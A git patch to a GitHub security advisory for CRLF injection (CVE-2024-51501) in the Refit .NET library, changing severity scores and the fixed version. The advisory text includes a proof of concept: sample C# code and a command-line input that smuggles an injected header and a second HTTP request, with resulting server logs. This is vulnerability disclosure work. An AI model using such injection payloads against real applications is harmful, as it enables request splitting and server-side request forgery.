From 301d5c46f594da346ece51443cd231a27cc32da8 Mon Sep 17 00:00:00 2001
From: Glenn <5834289+glennawatson@users.noreply.github.com>
Date: Sat, 9 Nov 2024 01:32:43 +1100
Subject: [PATCH] Improve GHSA-3hxg-fxwm-8gf7

---
 .../11/GHSA-3hxg-fxwm-8gf7/GHSA-3hxg-fxwm-8gf7.json  | 12 ++++--------
 1 file changed, 4 insertions(+), 8 deletions(-)

diff --git a/advisories/github-reviewed/2024/11/GHSA-3hxg-fxwm-8gf7/GHSA-3hxg-fxwm-8gf7.json b/advisories/github-reviewed/2024/11/GHSA-3hxg-fxwm-8gf7/GHSA-3hxg-fxwm-8gf7.json
index 4c664ee86092d..0c49a03b9c630 100644
--- a/advisories/github-reviewed/2024/11/GHSA-3hxg-fxwm-8gf7/GHSA-3hxg-fxwm-8gf7.json
+++ b/advisories/github-reviewed/2024/11/GHSA-3hxg-fxwm-8gf7/GHSA-3hxg-fxwm-8gf7.json
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-3hxg-fxwm-8gf7",
-  "modified": "2024-11-05T14:39:45Z",
+  "modified": "2024-11-05T14:39:46Z",
   "published": "2024-11-04T23:23:17Z",
   "aliases": [
     "CVE-2024-51501"
@@ -9,13 +9,9 @@
   "summary": "CRLF injection in Refit's [Header], [HeaderCollection] and [Authorize] attributes ",
   "details": "### Summary\nThe various header-related Refit attributes (Header, HeaderCollection and Authorize) are vulnerable to CRLF injection.\n\n### Details\nThe way HTTP headers are added to a request is via the `HttpHeaders.TryAddWithoutValidation` method: <https://github.com/reactiveui/refit/blob/258a771f44417c6e48e103ac921fe4786f3c2a1e/Refit/RequestBuilderImplementation.cs#L1328>\nThis method does not check for CRLF characters in the header value.\n\nThis means that any headers added to a refit request are vulnerable to CRLF-injection. In general, CRLF-injection into a HTTP header (when using HTTP/1.1) means that one can inject additional HTTP headers or smuggle whole HTTP requests.\n\n### PoC\nThe below example code creates a console app that takes one command line variable (a bearer token) and then makes a request to some status page with the provided token inserted in the \"Authorization\" header:\n\n```c#\nusing Refit;\n\ninternal class Program\n{\n    private static void Main(string[] args)\n    {\n        // Usage: dotnet run <bearer token> \n        string token = args[0];\n        var service = RestService.For<IStatusApi>(\"http://insert.some.site.here\");\n        string response = service.GetStatus(token).Result;\n        Console.WriteLine($\"Response: {response}\");\n    }\n\n    public interface IStatusApi\n    {\n        [Get(\"/status\")]\n        Task<string> GetStatus([Authorize(\"Bearer\")] string token);\n    }\n}\n```\n\nThis application is now vulnerable to CRLF-injection, and can thus be abused to for example perform request splitting and thus server side request forgery (SSRF):\n\n```bash\nanonymous@ubuntu-sofia-672448:~$ dotnet Refit-cli.dll $'test\\r\\nUser-Agent: injected header!\\r\\n\\r\\nGET /smuggled HTTP/1.1\\r\\nHost: insert.some.site.here'\nResponse: <html></html>\n```\n\nThe application intends to send a single request of the form:\n```http\nGET /status HTTP/1.1\nHost: insert.some.site.here\nAuthorization: Bearer <bearer token>\n```\nBut as the application is vulnerable to CRLF injection the above command will instead result in the following two requests being sent:\n```http\nGET /status HTTP/1.1\nHost: insert.some.site.here\nAuthorization: Bearer test\nUser-Agent: injected header!\n```\nand\n```http\nGET /smuggled HTTP/1.1\nHost: insert.some.site.here\n```\n\nThis can be confirmed by checking the access logs on the server where these commands were run (with `insert.some.site.here` pointing to localhost):\n```bash\nanonymous@ubuntu-sofia-672448:~$ sudo tail /var/log/apache2/access.log\n127.0.0.1 - - [29/Aug/2024:12:17:34 +0000] \"GET /status HTTP/1.1\" 200 240 \"-\" \"injected header!\"\n127.0.0.1 - - [29/Aug/2024:12:17:34 +0000] \"GET /smuggled HTTP/1.1\" 404 436 \"-\" \"-\"\n```\n\n### Impact\nIf an application using the Refit library passes a user-controllable value through to a header, then that application becomes vulnerable to CRLF-injection. This is not necessarily a security issue for a command line application like the one above, but if such code were present in a web application then it becomes vulnerable to request splitting (as shown in the PoC) and thus Server Side Request Forgery.\n\nStrictly speaking this is a potential vulnerability in applications using Refit, not in Refit itself, but I would argue that at the very least there needs to be a warning about this behaviour in the Refit documentation.\n\n",
   "severity": [
-    {
-      "type": "CVSS_V3",
-      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
-    },
     {
       "type": "CVSS_V4",
-      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P"
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
     }
   ],
   "affected": [
@@ -32,7 +28,7 @@
               "introduced": "0"
             },
             {
-              "fixed": "8.0.0"
+              "fixed": "7.2.22"
             }
           ]
         }
@@ -65,7 +61,7 @@
     "cwe_ids": [
       "CWE-93"
     ],
-    "severity": "HIGH",
+    "severity": "CRITICAL",
     "github_reviewed": true,
     "github_reviewed_at": "2024-11-04T23:23:17Z",
     "nvd_published_at": "2024-11-04T23:15:04Z"